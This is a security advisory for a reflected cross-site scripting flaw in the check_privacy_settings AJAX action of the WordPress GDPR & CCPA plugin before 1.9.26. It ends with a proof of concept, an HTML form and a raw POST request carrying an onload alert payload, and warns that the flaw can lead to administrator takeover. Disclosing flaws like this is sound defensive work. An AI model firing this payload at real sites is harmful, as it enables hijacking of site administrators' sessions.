WordPress GDPR & CCPA < 1.9.26 - Authenticated Reflected Cross-Site Scripting

Description

The check_privacy_settings AJAX action of the plugin, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. If the victim is an administrator with a valid session cookie, full control of the WordPress instance may be taken (AJAX calls and iframe manipulation are possible because the vulnerable endpoint is on the same domain as the admin panel - there is no same-origin restriction).

Note: v1.9.26 added a CSRF check in an attempt to fix the issue, which is not sufficient and the XSS can still be exploited against unauthenticated user. A separate issue has been created

Proof of Concept

<html>

  <body>

    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">

      <input type="hidden" name="action" value="check_privacy_settings" />

      <input type="hidden" name="settings[40]" value="40" />

      <input type="hidden" name="settings[41]" value="<body onload=alert(`XSS`)>" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>





POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 105

Connection: close

Upgrade-Insecure-Requests: 1



action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(`XSS`)%3e